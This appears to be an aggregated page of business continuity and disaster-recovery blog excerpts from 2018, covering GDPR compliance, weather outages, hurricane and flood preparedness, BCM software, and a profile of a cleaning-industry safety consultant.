Data is the lifeblood of an organization. It is at the heart of executive decision-making, risk evaluations, customer engagement, regulatory requirements and efficient operations. Yet, not all data used for these business decisions and reporting is made equal.

According to a recent TDWI survey report, “Reducing Inefficiency and Increasing the Value of Analytics and Business Intelligence,” only 11 percent of respondents said they were very satisfied with their companies’ investments in data and analytics projects to meet strategic goals for enabling data-driven decision-making or actionable customer intelligence.

The problem is that the self-service culture has created an abundance of rogue data sets and proliferated data across the enterprise where governance officers and IT professionals have no control over who is using the data and how they’re using it. Business users may be using outdated or inaccurate data for their analysis.

And there is no way to reel back data access as these same self-service analytical, visualization and data preparation applications allow enterprises to be nimble and use data for finding meaningful business insights. The trick is finding the balance between open data access and internal data control: Effective governance and data quality improvement only come when the right data intelligence strategy and stewardship is in place.



Every year in the June issue of CRN, The Channel Company publishes its Women of the Channel list citing the professional accomplishments, demonstrated expertise and ongoing dedication to the channel of hundreds of women. The Power 100 is a more focused list of women drawn from this larger list: women leaders whose vision and influence are key drivers of their companies’ success and help move the entire IT channel forward.

Sungard Availability Services (Sungard AS) has the privilege of employing women who are named to this prestigious list year after year, and this year was no different. Six women – including two of whom were named to the Power 100 – were selected for the Women of the Channel 2018 list.

Six members of the Sungard AS team were selected for the Women of the Channel 2018 list. Two were named to the Power 100 list.

“They’re all visionaries whose continued dedication and contributions make possible our mission to improve business resiliency,” said Tim Cecconi, Senior Vice President, Sales and Global Channels. “These executives are some of the best and brightest Sungard AS has to offer, and their demonstrated influence throughout the channel serves as a testament to the exceptional talent and innovation they bring to the industry.”

Being chosen for the Women of the Channel list is an honor no matter who you are. But Sungard AS wanted to know more about why their candidates were selected, and what qualities they think enable them to achieve success. Here is what Melissa McCoy, Michelle LeVan, Karen Falcone, Corre Curtice, Sarah Hamilton and Heidi Biggar have to say about the qualities that make successful women leaders:



I had an interesting week last week: Along with two other MHA consultants, I spent two and a half days performing a current state assessment of the business continuity situation at a large complex of hospitals on the West Coast.

We conducted 15 to 16 interviews with the key people at a wide range of departments to get a handle on where their BC program stands on everything from program administration to IT Disaster Recovery to fire and life safety.

It was an interesting challenge. In doing an assessment like that, your goal is to arrive quickly at an accurate understanding of the program’s strengths and weaknesses in the different areas. You have to work collaboratively with experts in many departments, gathering material that you will eventually structure into a report which includes, critically, a list of the steps the organization can take to help them improve their BC program and better carry out their core mission. This list is known as the roadmap.



Memorial Day Weekend 2018 was a deluge for many parts of the country.

Flash floods ripped through Ellicott City, Maryland. Subtropical storm Alberto triggered states of emergency in Florida, Mississippi and Alabama. Severe thunderstorms and tornadoes tore through the West and Midwest.

Amid all this, the National Weather Service (NWS) experienced an outage from Sunday evening into Monday, leaving meteorologists unable to access the weather data the NWS provides.

The National Weather Service experienced an outage on Memorial Day Weekend, leaving meteorologists unable to access the weather data the NWS provides.

It turns out the NWS switched to a new system for distributing data in recent years, and AccuWeather and other consumers of that data have expressed concerns about how the system would handle spikes in requests for data during major storms. Those fears weren’t unfounded.

It’s not the first time the NWS had an outage, either. There were several in 2014 due to firewall issues and in one case, too many requests from an Android app. In February 2017, two of the NWS’s core routers lost power. The Network Control Facility tried to switch over to a backup site, but failed. With both the primary and the backup unavailable, forecasts, warnings and other data went dark for nearly three hours.



As if it’s not enough that communities hit by disaster have to go about rebuilding, it’s inevitable that the suffering will attract scammers, sometimes called “storm chasers,” companies that target vulnerable communities rebounding from a disaster and other scam artists.

That’s what the Indiana Department of Homeland Security is warning residents about in the 35 counties that received emergency declarations earlier this year after severe flooding.  
These scammers will go door-to-door offering repairs and often do subpar work or don’t complete the work after receiving payment, which they often request up front.

“It’s sad that there are people out there who would take advantage of people who are distraught and have been through a horrible disaster and may be elderly or disabled,” said Erin Rowe, state director of emergency response and recovery for the Department of Homeland Security (DHS). “They call them storm chasers and there are some individuals and groups who have been identified.”



EAGLEVILLE, Pa. – BC in the Cloud, an integrated platform for business continuity and disaster recovery planning, today announced it will be exhibiting at the Disaster Recovery Journal’s Fall Conference “Reimagining Business Resiliency.”

The conference will be held Sept. 23-26, 2018, at the JW Marriott Desert Ridge Resort and Spa in Phoenix, Ariz. BC in the Cloud will be showcasing its platform in Booth 506/508. Along with speaking in the Solutions Track, Andrew Witts will present Program Totality – Managing the Connectivity and Completeness of an Entire Program.

“We’re excited to have BC in the Cloud as a sponsor of our fall show,” said Bob Arnold, President, DRJ. “They have always been one of the industry thought leaders and we are thankful to have their support and sponsorship for our Fall 2018 conference”.

“BC in the Cloud is looking forward to exhibiting at another successful DRJ Conference.  Our platform can do so many amazing things, it’s great to be able to show it off in person to the DRJ attendees,” said Frank Shultz, President, BC in the Cloud.

The Disaster Recovery Journal’s conferences are the world’s largest conferences dedicated to business resiliency and expects more than 1,000 professionals who are responsible for building business resiliency and managing disaster recovery in their organizations. With more than 65 sessions, 10 deep dive workshops and 70 companies in the expo hall, attendees can participate in interactive sessions, hands-on training with cutting-edge technology, hundreds of live demos and unparalleled networking. In addition, DRJ welcomes over 85 speakers who will share their expertise and learnings in this fast-paced changing environment that is the new normal. DRJ’s Fall Conference offers attendees everything they need to build a resilient organization in four days, under one roof.

To arrange a meeting or personal demo at the conference, contact BC in the Cloud at This email address is being protected from spambots. You need JavaScript enabled to view it. or 267-341-9610.

About BC in the Cloud

BC in the Cloud provides automated tools and services for building and maintaining effective plans that streamline and simplify Continuity, Governance and Risk Management programs. The BC in the Cloud Platform evolves as an organization’s needs grow to increase resiliency, mitigate risk, and adhere to deadlines. No other platform provider offers rapid speed-to-market and robust scalability in an all-in-one solution.


Engagement, Collaboration, and Data

A number of technologies are providing significant advances for IT auditors to embrace the digital age with proactive information that provides an even greater value to businesses.

Organizations everywhere are progressing on their digital journeys at a healthy clip. They’re evaluating and adopting new technologies quickly and compressing the time it takes for a project to go from concept to implementation. In this fast-paced, technology-driven climate, IT auditors and IT audit functions must also evolve and transform, with no time to waste.

IT auditors need to be more agile, dynamic and progressive in the ways they assess potential risks in IT initiatives and the overall IT environment. And they can start by stepping up their engagement and alignment with IT and business stakeholders across the organization.



Wednesday, 06 June 2018 15:23

Transforming IT Audit In The Digital Era

It seems the first question asked for any task is, “Is there an app for that?”

Much of what we do in business continuity is planning and protecting systems and applications. Quite a bit of what we do is manual, but in recent years, vendors have created software which can help business continuity programs in carrying out nearly every phase of their missions. These tools make BC activities more efficient, effective, and accurate, increasing the resilience of the organizations that deploy them.

Tools are available to help BC programs with the following activities, to name a few:



Wednesday, 06 June 2018 15:22

BCM Software: There’s An App for That

Emergency managers and the many different disciplines and organizations they partner with are working every day to make their communities a safer and better place to be; before, during and after a disaster. 

Having cut my teeth here on the West Coast, I have always envied emergency managers who have hurricanes as their worst-case disaster. This is for two reasons. One is that they have a set schedule on the calendar that is identified and known by as the hurricane season, which, by the way, just started on June 1, and was preceded by Tropical Storm Alberto. Evidently Alberto did not get the save-the-date message and arrived a few days early. 

Secondly, you can see hurricanes and tropical storms coming days, even weeks out as they form in the Atlantic or Gulf of Mexico. With our 24-hour news cycle, even the people who are procrastinators will finally run to the hardware store to get plywood and to the grocery store for canned food and water. People have time to heed warnings and evacuate from danger areas.



Wednesday, 06 June 2018 15:20

Earthquake Country Needs a Sense of Urgency

Keep energy flowing. Keep real estate protected. Keep medicines available.

From energy suppliers to global real estate brokers to national pharmacies, companies around the world are becoming increasingly digital. Organizations are adopting cloud, embracing IT transformation and adding modern, agile and efficient methods to harness the power of their business backbone: data. And with that unprecedented growth in information and analytics, data protection has evolved.

As a result, corporations are embracing solutions like Cloud Based Recovery for Actifio environments from Sungard Availability Services (Sungard AS) to back up their data and achieve virtual recovery more efficiently.

During the annual Actifio Data Driven conference (June 5-6), companies can explore new, efficient ways to achieve data protection.

Backed by 40 years of data protection and recovery experience, Sungard AS partnered with Actifio over three years ago to deliver a managed data replication and recovery solution to help customers achieve data protection transformation. With several petabytes 



SATA is a well-known technology in data storage circles, but what about M.2?

It's common to encounter M.2 solid-state drives (SSDs) while browsing a vendor's website or the virtual shelves of an online store. They typically lack enclosures — although many accessory makers offer cases for external use — and look like a cross between a memory stick and a small expansion card, complete with exposed chips some of which may be covered by a big sticker from the manufacturer.

What's the difference between these two storage technologies? 



Wednesday, 06 June 2018 15:18

M.2 vs SATA: Storage Showdown

Digital transformation. We hear this term used in many different contexts in our day to day conversations. Regardless of when or how it is used, one thing is clear, digital transformation could be the key to ensuring an organization’s survival over the next several years. During the recent Enaxis Leadership Forum, attendees were asked what they believed to be the biggest barriers they faced to achieve benefits of digital transformation:

  • Business Reorganization
  • Change Resistance from Leadership
  • Legacy Operating Models
  • Cost and Complexity of Cyber Threat Management
  • Lack of Digital Skills in Current Workforce

As we review these barriers, one thing is evident – these are the same barriers that organizations face for ANY type of transformation – not just digital. In the past, successful and forward-thinking companies have found ways to overcome these types of barriers to achieve their end goal – organizational transformation.



Wednesday, 06 June 2018 15:16


NOAA recently released their 2018 hurricane predictions and the Atlantic and Gulf coasts are expected to have a near- or above-normal season. Secretary of Commerce Wilbur Ross said, “The devastating hurricane season of 2017 demonstrated the necessity for prompt and accurate hurricane forecasts.” The same could be said about communications.

As businesses and organizations craft their hurricane preparedness plans, it is vital to business continuity and employee safety that hurricane communications are relevant and can be sent rapidly as conditions change. The fastest way to ensure every employee receives the right message at the right time is to utilize hurricane notification templates. Modern emergency communications solutions will provide templates that companies can send across all communication channels, including email, text, push notifications and phone calls.



Security and resilience – Business Continuity Management Systems – Guidelines for people Aspects of business Continuity

This document gives guidelines for the planning and development of policies, strategies and procedures for the preparation and management of people affected by an incident.

This includes:

  • preparation through awareness, analysis of needs, and learning and development;
  • coping with the immediate effects of the incident (respond);
  • managing people during the period of disruption (recover);
  • continuing to support the workforce after returning to business as usual (restore).

The management of people relating to civil emergencies or other societal disruption is out of the scope of this document.



Wednesday, 06 June 2018 15:09

ISO/TS 22330:2018

Top 5 Best Practices for Data Management

In today’s data-driven digital economy, traditional databases struggle to keep up with the increasing amount of streaming data. Adding to this stress are new compliance regulations, such as GDPR, that often complicate core processes across industries, including financial services. This article will discuss how financial service organizations can keep pace with growing data compliance requirements without compromising speed or impacting business activities.

Analyst firm IDC predicts that by 2025 the global ‘datasphere’ will swell to a staggering 163 zettabytes of data generated per year – that’s ten times the data generated in 2016. In today’s data-driven digital economy, traditional databases struggle to keep up with increasing amounts of data that stream in faster than ever. Compounding the challenges created by the dramatic increase in both the speed and scale of data is the broad impact of new data management and compliance regulations that often complicate core processes across every industry, including financial services.

Many financial services organizations comply with existing regulations, such as BASEL III, FFIEC, Sarbanes–Oxley and Markets in Financial Instruments Directive (MiFID II), along with the Fundamental Review of Trading Book (FRTB) requirements that went into effect in January. On deck is the General Data Protection Regulation (GDPR). Effective May 25, 2018 and issued by the European Union (EU), GDPR requires that any organization that handles data from an EU resident must be compliant. This includes providing increased transparency when reporting a security or confidentiality breach to regulators and those whose data is affected, all within specified timeframes.

The ever-increasing list of regulations is forcing financial services organizations to button up data management best practices. To better manage growing data volumes and effectively limit risks associated with compliance regulations, these organizations are breaking down data silos to provide better visibility and integration across the enterprise. However, as financial services organizations modernize their data infrastructures, they are often challenged to balance evolving compliance regulations with additional demands of their data, such as those around customer experience and operational productivity.



You’ve reviewed all the benefits and determined that your organization needs a mass notification system.

Congratulations! You’re one step closer to providing a secure and collaborative communication channel for your teams and community. Now comes the difficult part: determining what type of system is best for your specific needs, nailing down some finalists and making your purchase. This blog will walk you through what you need to consider before making a final decision, as well as how to present your case to gain internal buy-in for your recommendation and budget.

Consider These Features and Services

When you are purchasing a mass notification system, there are certain features and servicesthat you will want to consider. Emergency notification systems (ENS) are complex, and you will find that there can be significant differences between systems. Features to keep in mind include:



Fintech Collaborations on the Rise

Fintech-bank partnerships result in growth opportunities. In this article, Krista Morgan examines the risk-reward relationship in this growing trend.

The strength of our banking system is that we trust it. That trust comes from knowing that banks follow rules designed to protect us. As consumers, we want to know that our money will be safe, our identities will be protected, and things will work the way we expect them to. We want all of that – but we also want a zero-hassle experience with our financial institutions that is incredibly fast and seamless.

Not an easy value proposition to deliver on. Banks need fintech firms to deliver experiences that today’s consumers expect. In fact, 89% of community banks believe bank and fintech collaborations will be common by 2027. At the same time, the banks need these fintech firms to maintain trust which, for better or worse, comes from regulatory compliance.



2018 may only have just begun, but it looks like a big year for information security. With questions being raised about the security of micro-processors, and major cyber security initiatives such as the EU’s General Data Protection Regulation brought into effect this year, a new edition of ISO/IEC 27000 has come at just the right time.

ISO/IEC 27000:2018 provides the overview of information security management systems (ISMS), and terms and definitions commonly used in the ISMS ISO/IEC 27001 family of standards. Designed to be applicable to all types and size of organization from multinational business to small and medium-sized enterprises, the new version, released in February 2018, is equally valuable to government agencies or not-for-profit organizations.

There are more than a dozen standards in the 27000 family. The recently published ISO/IEC 27000 provides an understanding of how the standards fit together: their scopes, roles, functions and relationship to each other.

The ISO/IEC 27001 community will find this standard useful, since it brings together all the essential terminology used by other standards in the ISO/IEC 27000 family.



Starting a career in technology is one way to ensure you’ll have to continually evolve. The technology transforming industries today might be obsolete tomorrow.

But while the technology changes, there are timeless ways to manage your career to ensure you rise to the top and stay at the forefront of what’s new.

We gathered insights and advice from six of our top executives on what they wished they knew when they were starting their careers and common mistakes they see recent graduates make. Their answers are a guide for any technology professional starting their journey.



The EU’s new General Data Protection Regulation (GDPR) sets forth a “lawful basis” for collecting and processing personal information. It will require most organizations to significantly improve data management and security, but most organizations are not ready to comply, especially with the requirement to demonstrate compliance. Fortunately, a company’s existing GRC tools, which are designed as central repositories for documenting and reporting on internal governance activities, can help organizations quickly implement the tracking processes necessary to demonstrate compliance.

Personal information is an increasingly valuable – and risky – business asset. Organizations want to collect as much personal information as possible to support better decision making and an improved customer experience. However, the fear of identity profiling, along with high-profile cyberattacks, has caused increasing concern about how to protect this information. The EU’s General Data Protection Regulation (GDPR), which goes into effect in May of this year, aims to add privacy protections for all individuals currently residing in the EU, whether they are citizens or not. It also impacts most organizations around the world that are collecting or processing data about EU residents, even if the organization does not have a physical presence in the EU.

The regulation sets forth a “lawful basis” for collecting and processing personal information and will require most organizations to significantly improve data management and security. Yet, according to multiple surveys, most organizations are not ready to comply, even though a compliance failure can be expensive, up to 4 percent of annual global turnover or €20 million, whichever is greater, and will likely result in damage to reputation and undesirable notoriety.

One of the trickiest areas of the regulation is that organizations must be able to demonstrate compliance. Think of it this way: a police officer typically needs to catch you speeding before giving you a ticket. But what if instead, you needed to prove that you had not sped during your entire drive? That’s the challenge of GDPR.



Have you ever had to bail out of an airplane?… Me neither, fortunately. But imagine if you did, and your parachute was too moth-eaten and tangled to support you because you hadn’t maintained it properly. Fun, right?

I see the same thing all the time with organizations’ recovery plans. The organization has a plan. They created it at some point in the past, and maybe at one time, it was actually pretty good. But that was a while ago, and they haven’t thought about it or looked at it recently. They’ve been too busy doing other things.

And then all of a sudden, there’s an emergency, and the organization realizes they need to implement their trusty old recovery plan in order to deal with the incident and minimize its impact on the business—but the plan is so moth-eaten it barely works.

Don’t let this happen to you.

In my experience, there are seven main ways in which recovery plans are commonly allowed to become out of date. Here they are; do any of them apply to you?



“Text Messaging Can Expose Your Company to Significant Risks”: In this article, Mike Pagani explains that texting is quick, easy, reliable and efficient — but if it’s used for official business communications, it can create tremendous risk for a company. Organizations of all sizes need to put the right policies in place, and implement automated text archiving and supervision systems as soon as possible—before it’s too late.

Texting is simple, concise and supported by virtually every mobile device, operating system and wireless carrier. This makes it the go-to preference employees need to communicate with their colleagues, customers, or prospects in a time-crunched, always-connected society.

Ungoverned Text Messaging is a Growing Concern

Even though texting is quick, easy, reliable and efficient — if it’s used for official business communications, it can create tremendous risk for a company. When you consider the countless regulatory, legal and general risk and brand management challenges that companies must manage today, you might think email and other “official” communications using social media accounts and corporate websites are the only content types that need to be archived or actively supervised. Although its use by employees for official company business is often prohibited by organizations, the reality is text messaging does get used and therefore should be governed the same way as all other channels. Sending text messages between mobile devices is now one of the key ways that employees connect with each other and customers, and these records need to be maintained for completeness.

Compliance, legal, IT and risk and reputation professionals across a variety of litigious and regulated industries are now realizing that proactively automating the archiving and supervising of text messages is necessary to mitigate the myriad of potential risks arising from their records retention and oversight practices not keeping pace as employee use increases. Text messaging without proper governance is a major gap that can no longer be ignored.



Everyone knows that natural disasters aren’t spread evenly across the United States, rather they occur in the same places year after year.

This fact was given striking visualization in a recent New York Times article called “The Places in the U.S. Where Disaster Strikes Again and Again.”

The article and accompanying maps are well worth checking out, especially for anyone involved in business continuity and disaster recovery.

The article was based on an analysis of data from the Small Business Administration from between 2002 and 2017. It looks at places in the U.S. where businesses applied for loans to rebuild following natural disasters. However, the data provides a reliable window into where disasters cause the most damage overall.

As it turns out, the same tiny portion of the country is responsible for the vast majority of disaster losses year after year.



2017 was a highlight reel of worst-case scenarios. WannaCry forced some organizations to play tug o’ war with their own data, while hurricanes halted business operations across the South. It felt like one terrible catastrophe after another, and while many organizations had effective safeguards in place, some did not. For those businesses who were unprepared, the series of disasters was a harsh wake-up call.

So what’s the state of disaster recovery (DR) today? A recent survey of 375 U.S. business leaders shows exactly how organizations are approaching their DR plans post-2017.

These disasters definitely left their mark: 33 percent of respondents said they aren’t confident in their business’s ability to overcome a disaster, and 57 percent said they would reconsider their existing DR plans or consider implementing a new one as a result of 2017’s massive hurricanes.



Do you remember when the first cell phones were commercially available?

One of the highest advertised benefits of mobile devices was the ability for travelers to contact help in the case of a roadside emergency. Today, cell phones have evolved into smartphones, and 95 percent of Americans have some form of mobile device. By utilizing a mobile notification system for alerting your staff who are traveling or are remote employees, you can protect and inform them easily in the event of an emergency.

Weather Alerts

From hurricanes and tornadoes to hail storms and wildfires, inclement weather is always right around the corner. Staying in touch with employees during storms is vital for many reasons. Start with weather alerts and warnings. Your primary duty is to protect staff while on the road, whether they’re traveling abroad or on route to work at a local office.

Using notification technology allows your company to contact all employees who are traveling. Consider a system that has two-way communication. This allows employees to share first-hand information about weather conditions, and to connect with you in case of an emergency.



(TNS) - On the Big Island of Hawaii, the ongoing eruption of Kilauea volcano is giving residents a lesson in what it's like to live on the flanks of an active volcano.

Fissures oozing lava won't be opening up in southcentral Alaska anytime soon. But the region around Alaska's biggest city is hardly a stranger to volcanic eruptions and the mayhem they can cause.

Our closest neighbor volcanoes have an explosive, active history. Mount Iliamna, Augustine Volcano, Mount Redoubt and Mount Spurr — "have done some really bad things," said Chris Waythomas, a research geologist with the Alaska Volcano Observatory in Anchorage.

Over the past 60 years alone, Anchorage and Southcentral Alaska has been repeatedly dusted by ash from erupting volcanoes strung down the western side of Cook Inlet. Ash from exploding volcanoes has shut down airports, fouled car engines and machinery and sent residents stocking up on air filters and face masks, most recently when Redoubt erupted in March of 2009.



(TNS) - Residents, merchants and officials in Ellicott City on Monday began to examine the devastation wrought by the floods that coursed through the historic mill town the night before, for the second time in less than two years.

Old Ellicott City’s Main Street remained blocked off Monday as crews inspected buildings. Police were searching for a Maryland National Guardsman who was reported missing during the flooding Sunday. Cars lay on their sides or upside down in streams and along the road. A crane tow truck was brought in to lift them out. Utility workers began to restore power, fix a broken water line and bypass a broken sewer pipe.

Amid the immediate recovery efforts on Monday, the question was inescapable: Should Ellicott City, founded in 1772, devastated by floods in 2016 and now again in 2018, try to rebuild again?



As the GDPR comes into effect, many marketers are scrambling to align their online marketing strategies to the regulation. Unfortunately, like most regulations, there are many requirements that are confusing or ambiguous; one of those is the treatment when requiring visitors to provide their contact information to receive access to restricted (gated) content, such as white papers and research.

What Does the Regulation Say?

Article 7 of the regulation is very clear when it comes to the collection of personal EU resident information: Consent must be clearly given for processing of personal data, the data subject must be made aware of how the information will be used, and they must have the ability to withdraw consent at any time.



Tuesday, 29 May 2018 14:58

GDPR: The End of Gated Content?

In this article, Wendy Wysong, Peter Coney and Tatsuhiko Kamiyama examine three key governance reforms coming from Japanese legislators and what global companies need to know going forward.

‘Japan Inc’ is now back on the front pages with many Japanese corporations increasingly pursuing significant M&A opportunities internationally given the mature market at home and high levels of cash reserves.

The corporate landscape in Japan has, however, also been changing in other less head-line grabbing ways in recent years. As a consequence of a number of high-profile corporate scandals, Japanese legislators have been busy tweaking their legislative settings to further improve corporate governance in the world’s third biggest economy.

This article focuses on three such reforms:

  • the bolstering of the role of independent outside directors;
  • the introduction of Japan’s first ever plea-bargaining regime; and
  • the release of Japan’s ‘Principles for Listed Companies Dealing with Corporate Malfeasance’.

For the reasons explained below, global companies with operations in Japan should keep in mind this shift towards more regulation in Japan.



Today’s emergency alert systems need to be reliable and accurate.

In the wake of the terrifying January 2018 false alert to Hawaii residents, the public expects its emergency alert systems to operate consistently and properly.

The crux of general public notification systems in the United States is the Integrated Public Alert and Warning System (IPAWS). The system was developed to alert the public across multiple channels — radio, television, wireless devices, and other communication platforms. It is supposed to be deployed when there is an emergency that threatens life and property. It is often used to alert the public to a missing child but can also be used to alert about impending natural disasters or man-made incidents such as a chemical spill.



Some disasters are more likely to strike than others. If your business is based in Minnesota, you probably don’t have to worry about hurricanes. If you’re based in Florida, preparing for blizzards probably isn’t high on your list of priorities.

But no matter where you’re based, you should be prepared for flooding.

In recent years, we’ve seen flooding devastate everywhere from Hawaii to California to Texas to Tennessee to New Jersey, and beyond. Any business near the coast, a river, or in a low-lying area should have a plan in place to minimize any disruptions flooding might cause.

As your business braces for potential impacts, you should obviously rely on your DR plan, but there are several actions that the most resilient businesses take both before and after flooding that are worth calling out specifically.

If you experience flooding in your area, here’s what you should be doing.



Researchers predict we’re in store for another rough hurricane season. If previous years have taught us anything, it’s that these storms can quickly evolve in ways we can’t anticipate. You may not be able to control when or where a storm hits, but you can ensure your business is ready when it happens.

We put together a quick guide to help you prepare your business for hurricane season, particularly if you work along coastal areas. Effective hurricane preparation keeps your people safe, your business running, and limits the danger to and losses for your entire organization.



Friday, 25 May 2018 14:31


I don’t know if business continuity management software is the best thing since sliced bread, but it is pretty terrific stuff, in my opinion.

Of course, for BCM software to live up to its potential, a few important criteria must be met, in terms of the suitability of the software chosen, the attitude of the people administering it, and the characteristics of the organization (I’ll go into all that in more detail in the second part of the post).

But generally speaking, if you are a business continuity professional, I think that using BCM software—for business continuity planning, BIAs, metrics, and compliance—can change your life for the better. More to the point, it can change the BC program at your organization for the better, increasing its resiliency and boosting its ability to recover from a disruption.



Data encryption and data masking technologies are important tools to provide GDPR mandated data protection and data privacy. With careful key management, encryption provides a powerful tool for your arsenal of GDPR best practices. End-to-end encryption provides strong data protection for your on-premise data centers as well as for your cloud-based applications and data. Data masking is also a very important adjunct technology. Together, encryption and data masking give you the broad flexibility to meet a broad mix of GDPR data security needs in support of your European Community customers.

In December 2016, the European Community ratified the EU General Data Protection Regulation (GDPR), which goes into effect this month on May 25, 2018. The GDPR replaces the European Community’s Data Protection Directive 95/46/ec (ECDPD 95/46/ec) on that same date.

The GDPR gives EU citizens much more control over the data that regulated entities can acquire, store, and use. These regulated entities include data processors, which are responsible for processing personal data on behalf of a controller, and controllers. Controllers make decisions about the processing of data and provide specific direction data processors. Both controllers and data processors have direct compliance obligations under the GDPR. The GDPR empowers citizens by requiring that companies simply and clearly obtain explicit permission to process their personal data and that just as easily, EU citizens can withdraw their consent at any time. This data includes just about anything that can be used to identify an individual uniquely.

The GDPR regulation is broad in scale. It is applicable to any entity that offers products and services to the European Union. The GDPR also applies to any service that gathers data about the behavior, online or otherwise, of these individuals within the European Union. In terms of scope, the GDPR applies to just about any business that conducts transactions, from any place on the globe, with a user in the EU.



(TNS) - Officials at Crosby's Arkema chemical plant were warned that the facility was at risk for flooding a year before Hurricane Harvey's deluge resulted in a chemical fire at the plant.

But facility employees, with the exception of a manager who left in early 2017, "appeared to be unaware of this information," an inquiry by the U.S. Chemical Safety And Hazard Investigation Board found.

The board concluded that Arkema, a French multinational company that manufactures chemicals used to create plastic products, was not prepared for flooding of this magnitude. During Harvey, 6 feet of water wiped out the facility's power and backup generators. With the power out and cooling systems failing, volatile organic peroxides exploded multiple times over the course of a week, producing towering pillars of fire and thick plumes of black smoke.

The board -- an independent federal agency that investigates industrial chemical accidents --released a 154-page report Thursday morning detailing their findings.



In just a few days, on May 25, the clock will expire on the two-year transition period for companies to reach compliance with the General Data Protection Regulation (GDPR). This not only impacts organizations operating in the European Union (EU), but also affects companies in the United States and elsewhere that handle the personal data of anyone who resides in the EU. Those who fail to comply with the GDPR rules on contact data will face fines of up to €20 million ($24 million)—or 4 percent of global revenue/turnover.

GDPR has been billed as “data protection on steroids,” and with just a few days to go, 83 percent of all companies subject to the law lack confidence they’ll be able to meet the deadline. Based on my own recent discussions with various European channel partners—companies that partner with a manufacturer or producer to market and sell the manufacturer’s products, services, or technologies— only about half, within the UK, said they had completed their preparations and fully tested their compliance with GDPR



MrCleanThe founder and President of Safety Projects International Inc. has a mission – to help clean up the U.S., Canada, and several other countries. However, rather than doing it himself, Dr. Bill Pomfret aka Dr Clean is getting the workers themselves to do it – which is simple in its logic but offers a huge challenge in its execution.

"The state of cleanliness affects us in every aspect of our everyday lives, whether we're a patient in a hospital, a pupil in school, a customer in a restaurant or an employee in the workplace," Dr. Bill says.

"But most people fail to realize that cleaning is a science." Treatment of the cause, not the symptoms, coupled with a healthy dose of preventive medicine, is his prescription for the endemic problem faced by most countries that he visits. First, that means completely breaking down the tolerance for filth and replacing it with a culture of cleanliness.

And second, people will have to be educated on the best ways to clean up and to stay clean. Dr. Bill is well aware of the big, big job that is cut out for him, and that it involves more than just trying to change people's attitude or mindset. That is but a starting point, even though it is a massive challenge in itself, as evidenced by the limited success of the numerous public cleanliness campaigns undertaken in many countries so far, including South Africa, the Philippines and Malaysia to name a few.

There is no question that 72-year-old Dr. Bill is committed to his cause. He has, after all, got a 40-year-old lucrative business. But to him, raising most country's standards of cleanliness is part and parcel of occupational health and safety, both curative and preventive. Five years ago, he set up the education training Center for Cleaning Science and Technology in the Philippines (CCST), the country's first such facility.

MrClean2Located in San Isidro, Nueva Ecija the center conducts, inter alia training programs for the cleaning service industry, as well as local councils, building owners, and property managers. With the primary objective of raising the status and standards of the Philippines's cleaning industry, After all, like Porta Rico for the U.S.A. the number one export from the Philippines, is its people, mostly exported as live in caregivers. The Open University’s Institute of Professional Development accredits the center’s cleaning proficiency program. Before setting up the facility, Dr Pomfret had personally audited and surveyed the way cleaning operators normally worked. Some of his findings proved to be shocking. For example, a same mop was used to clean the toilet and the kitchen; the same rag to clean the bathroom and to wipe tables in eateries; and a same pail of filthy water used to mop corridor after corridor.

His conclusion was that many contract cleaners, not restricted to the Philippines, but Internationally were simply clueless about cleaning.

Mostly, the exercise seemed to be aimed not at actually cleaning but at creating the impression that cleaning had been done, that is, not to sanitize but to look clean.

"The thing is you have to clean right," Dr Pomfret stresses. "You may not be able to control the public entirely but you can control the cleaners and the quality of cleaning." During his travels, he had also visited Singapore's Institute of Cleaning Sciences, a franchise of the British Institute of Cleaning Sciences. Graduates, and professional cleaners are required to sit a proficiency test, both theory and practical.

In most countries, it is important that building owners, property managers and local councils send their staff for formal, practical training, Dr. Pomfret adds. This is because there are today very wide ranges of cleaning machines designed for all kinds of functions. Then there are the chemicals, which must be handled properly. In addition, cleaning processes can be quite job-specific, be it the cleaning of air ducts, treatment and prevention of graffiti, maintenance of various types of surfaces or basics like chewing gum removal.

For cleaning companies, such training makes economic sense, too. For instance, without this knowledge, they will not be able to realistically device a price structure upon which to negotiate a cleaning contract. As for the prospective clients, most will recognize that it is best to go with a professional outfit to minimize the risk of ending up with a whopping bill on restoration works for a botched-up job.

"Lack of know-how among property managers is the primary cause of poor maintenance of buildings," says Dr Pomfret. "They get incompetent cleaners and these people destroy the properties.

So the management has to cough up money to do yearly restoration and refurbishing." Business owner Bill Thompson agrees. "The notion that a mop and bucket is all you need to clean is archaic.”

In most developed countries, cleaning has become a highly professional field. In fact, the 'First World Facility, Third World Mentality' complaint from visitors regarding the U.A.E. amenities can be attributed to the fact that cleaning as a process has been hugely neglected.

"The industry must become professional in the shortest time possible. As a matter of urgency, a body comprising the Government, local and city councils, training schools, suppliers, contractors and other stakeholders should be set up to draw up minimum standards," Pomfret says, some 20 years ago, I helped develop the 5 Star Health and Safety Management SystemÔ the first part I concentrated on, was housekeeping “Cleanliness and Order” this gives the employer, the biggest bang for the buck.

Arguing that Governments should be more receptive and exposed to the cleaning service industry, Pomfret - whose company has been in the health and safety business for over 50 years - says: "Right now, it's a free-for-all. Unless standards are imposed and cleaning contractors are certified and classified, many countries will continue to be plagued by poor maintenance and dirty surroundings." Dr Pomfret may remind one of a young Don Aslett, the author of numerous books on cleaning techniques and self-styled No. 1 cleaner in America, but all he dreams of is a day when no person would fear to walk into a public toilet in any country he has trained.

Meanwhile, Dr. Clean as he is known has trained staff from many companies in the Philippines and the U.A.E. South Africa and elsewhere. The going has been tough, still is, principally because of the need for him to relentlessly prod and irritate people into action, even just to see the urgency of the matter. On the positive side, he can be likened to a grain of sand in an oyster, which will one day become a pearl – and be appreciated.

DR CLEAN'S DIAGNOSIS INDUSTRY MUST BE RATIONALISED: Nobody can tell for sure about something as basic as the size of the industry. There are so many players but numbers don't guarantee quality. And there are no proper guidelines to qualify cleaning enterprises for bids to undertake a cleaning and building maintenance job.

Without guidelines on such things as a company's manpower, technological and management capacity as well as know-how, anyone with minimal or zero knowledge can bid for contracts. Unlike in the construction industry where contractors are graded, there is no classification of cleaners based on professional competence.

THE CLEANERS, THEY MUST BUCK UP: Cleaning know-how and cleaning product knowledge are not fully pursued by cleaners. Unlike the UK and Singapore, which imposes practical and theory tests on would-be cleaning operatives (questions range from which chemical to use on which type of surface to which color pad to use for which scrubber machine for which function), most western countries cleaning service industry operates on the basis of: “even my grandmother can do that job”.

WHAT STANDARD? There are no established standards for cleanliness.

